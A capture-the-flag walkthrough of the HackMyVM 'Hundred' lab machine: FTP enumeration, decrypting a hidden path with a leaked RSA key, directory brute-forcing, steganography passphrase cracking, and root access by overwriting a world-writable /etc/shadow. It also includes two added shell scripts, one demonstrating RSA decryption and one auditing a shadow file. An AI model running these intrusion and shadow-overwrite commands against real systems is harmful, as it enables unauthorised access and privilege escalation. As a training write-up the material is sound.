Hundred – Writeup – HackMyVM – Walkthrough

Hundred is an easy machine from HackMyVM. The author of the machine is SML, who created it to celebrate 100 machines on the platform. The machine is pretty easy but requires a few special techniques to get to root.

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Hundred

Identify the target

Firstly, I identified the IP address of the target.

fping -aqg 10.0.0.0/24
The IP address of the target is 10.0.0.14

Scan open ports

Next, I scanned the open ports to know the exposed services on the target.

nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.14
Nmap scan results

From the nmap scan results, we see that ports 21, 22 and 80 are open. Furthermore, we have anonymous access to the FTP server. Likewise, there are files that look like private keys. So, I logged into the FTP server anonymously and downloaded all the files.

Anonymous access to FTP

I like to use lftp as an FTP client.

lftp -u anonymous, 10.0.0.14

# in client
mget *
The files on the FTP server

id_rsa is a fake private key and it just has a bunny on it.

The content of id_rsa

However, id_rsa.pem looks like a genuine private key.

The content of id_rsa.pem file

Similarly, the users.txt file lists some users of the HackMyVM platform. However, at the bottom of the file there is a likely username, ‘hmv’.

The content of users.txt file

However, the private key did not work for that user, so I looked further at the web server.

Enumerate the webserver

On the page source of the website, we see some information.

Page source of the website

The page as a whole tells us that there is a directory we can reach by using the key. Also, we might get some information by applying steganography tools to the logo.jpg file. Back to the key: OpenSSL rsautl encrypts data for an RSA key pair and decrypts it with the private key, and the resulting .enc file might be the one referenced in the CSS style. Hence, I checked whether the file exists.

wget http://10.0.0.14/h4ckb1tu5.enc
The encoded file is downloaded

After downloading the file, I decrypted it with the private key that I had taken from the FTP server.

openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key
cat key
The decrypted file contains a path
The path shows nothing in the browser
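To show what is going on with h4ckb1tu5.enc, here is an added example (not part of the original writeup) that reproduces the flow with a throwaway key pair: the web content is encrypted to the public half, and only the matching private key, the one left on the anonymous FTP share, recovers the path. It uses openssl pkeyutl, the non-deprecated successor of the rsautl command used above, with OAEP padding (rsautl defaults to PKCS#1 v1.5). The directory name is the one from the writeup; the key pair, file names and helper function names are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original writeup): RSA encrypt/decrypt flow with
# a throwaway key pair, using openssl pkeyutl. The directory name comes from
# the writeup; keys, file names and function names are constructed here.

# Skip cleanly on systems without openssl.
command -v openssl >/dev/null 2>&1 || { echo "openssl not installed, skipping"; exit 0; }

WORK=$(mktemp -d)

# Generate a 2048-bit RSA key pair: key.pem is the private key (what the FTP
# share leaked), pub.pem is the public half used to encrypt the web content.
make_keypair() {
  dir=$1
  openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out "$dir/key.pem" 2>/dev/null
  openssl pkey -in "$dir/key.pem" -pubout -out "$dir/pub.pem"
}

# Encrypt a short string with the public key; the output is a binary blob
# comparable to the .enc file served by the web server.
encrypt_with_pub() {
  printf '%s' "$2" | openssl pkeyutl -encrypt -pubin -inkey "$1/pub.pem" \
    -pkeyopt rsa_padding_mode:oaep -out "$1/secret.enc"
}

# Decrypt with a given private key and print the plaintext; prints nothing
# when the key does not match (OAEP makes that failure deterministic).
decrypt_with_priv() {
  openssl pkeyutl -decrypt -inkey "$2" -in "$1/secret.enc" \
    -pkeyopt rsa_padding_mode:oaep 2>/dev/null || true
}

# Full round trip: the correct private key recovers the hidden path.
rsa_roundtrip() {
  dir=$1
  make_keypair "$dir"
  encrypt_with_pub "$dir" "$2"
  decrypt_with_priv "$dir" "$dir/key.pem"
}

# Holding an unrelated private key yields nothing (requires rsa_roundtrip to
# have produced secret.enc in the same directory first).
wrong_key_result() {
  dir=$1
  mkdir -p "$dir/other"
  make_keypair "$dir/other"
  decrypt_with_priv "$dir" "$dir/other/key.pem"
}

echo "decrypted with the matching key: $(rsa_roundtrip "$WORK" /softyhackb4el7dshelldredd/)"
echo "decrypted with an unrelated key: '$(wrong_key_result "$WORK")'"
```

The point for a defender is in the second call: the ciphertext on the web server is worthless without the private key, so the finding that matters on this box is the key file sitting in an anonymously readable FTP directory, not the encrypted blob.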

The path returned nothing useful, so I brute-forced directories and files under it.

gobuster dir -r -u http://10.0.0.14/softyhackb4el7dshelldredd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -o dir-softyhack.log
The paths on the newly found directory

Here, we have another file that looks like a private key.

wget http://10.0.0.14/softyhackb4el7dshelldredd/id_rsa -O id_rsa
chmod 600 id_rsa

However, when I tried logging in as the user hmv, it asked me for a passphrase, so I had to find it. As I said earlier, the logo.jpg file might hide information via steganography. The rockyou.txt wordlist did not work, but the users.txt file from the FTP server contained the passphrase.

wget http://10.0.0.14/logo.jpg
stegseek logo.jpg users.txt -xf output
cat output
The passphrase is extracted from the logo.jpg file
SSH shell of hmv

Root privilege escalation

The root privilege escalation is also easy on this machine. The /etc/shadow file is writable by everyone. Thus, I could overwrite the file with a password hash of my own choosing for root.

The file permissions on the /etc/shadow file

Since we can write to the file but not read it, we have to overwrite the whole file rather than edit one entry. Also, please check the following link to understand the format of a shadow file.

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

Thus, I updated the password to “root” as follows.

openssl passwd # enter new password "root"
echo root:ZY300BQ.Lbmo6:18844:0:99999:7::: > /etc/shadow
su -l
The root shell
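From the defender's side, the two things that made this escalation trivial are the world-writable /etc/shadow and the legacy 13-character DES crypt hash that openssl passwd produced. The following added example (not part of the original writeup) audits a shadow-format file for both: it flags other-writable permissions, parses each entry and classifies the hash type. The root line reuses the hash shown above; the other entries, the sample file location and the function names are constructed for the example, and nothing here touches the real /etc/shadow.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a shadow-format file
# for world-writable permissions and classify each account's password hash.
# Works on a constructed copy in a temp directory, never on /etc/shadow.

SAMPLE_DIR=$(mktemp -d)
SAMPLE_SHADOW="$SAMPLE_DIR/shadow"

# Constructed sample: root's hash is the DES crypt value from the writeup,
# hmv gets a made-up sha512crypt-style hash, daemon is locked, guest is empty.
cat > "$SAMPLE_SHADOW" <<'EOF'
root:ZY300BQ.Lbmo6:18844:0:99999:7:::
hmv:$6$saltsalt$constructedhashvalueconstructedhashvalueconstructedhashvalue:18844:0:99999:7:::
daemon:*:18844:0:99999:7:::
guest::18844:0:99999:7:::
EOF
chmod 666 "$SAMPLE_SHADOW"   # reproduce the misconfiguration from the box

# Return 0 if "other" has write permission on the file, 1 otherwise.
# Parses the ls mode string (char 9 is other-write) for portability.
world_writable() {
  mode=$(ls -ld "$1" | cut -c1-10)
  case "$mode" in
    ????????w?) return 0 ;;
    *)          return 1 ;;
  esac
}

# Print the class of the password field for one user:
# empty, locked, md5crypt, sha256crypt, sha512crypt, yescrypt, descrypt, unknown.
hash_kind() {
  user=$1; file=$2
  hash=$(awk -F: -v u="$user" '$1==u {print $2; exit}' "$file")
  case "$hash" in
    "")        echo empty ;;
    '*'|'!'*)  echo locked ;;
    '$1$'*)    echo md5crypt ;;
    '$5$'*)    echo sha256crypt ;;
    '$6$'*)    echo sha512crypt ;;
    '$y$'*)    echo yescrypt ;;
    *) if [ ${#hash} -eq 13 ]; then echo descrypt; else echo unknown; fi ;;
  esac
}

# Run all checks on one file; return 1 if anything needs attention.
audit_shadow() {
  file=$1; rc=0
  if world_writable "$file"; then
    echo "FAIL: $file is writable by everyone ($(ls -ld "$file" | cut -c1-10))"
    rc=1
  fi
  while IFS=: read -r user hash rest; do
    kind=$(hash_kind "$user" "$file")
    case "$kind" in
      empty)    echo "FAIL: $user has an empty password field"; rc=1 ;;
      descrypt) echo "WARN: $user uses legacy DES crypt (13-char hash, 8-char max password)"; rc=1 ;;
      *)        echo "ok:   $user ($kind)" ;;
    esac
  done < "$file"
  return $rc
}

if audit_shadow "$SAMPLE_SHADOW"; then
  echo "no findings"
else
  echo "audit found problems (see above)"
fi
```

On a real host you would point audit_shadow at /etc/shadow as root; the expected result is mode 640 or stricter, root-owned, with every active account on sha512crypt or yescrypt. The DES warning matters because openssl passwd without -1/-5/-6 emits that 13-character format, which truncates passwords to 8 characters.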

Check my walkthrough of ICMP from Vulnhub.
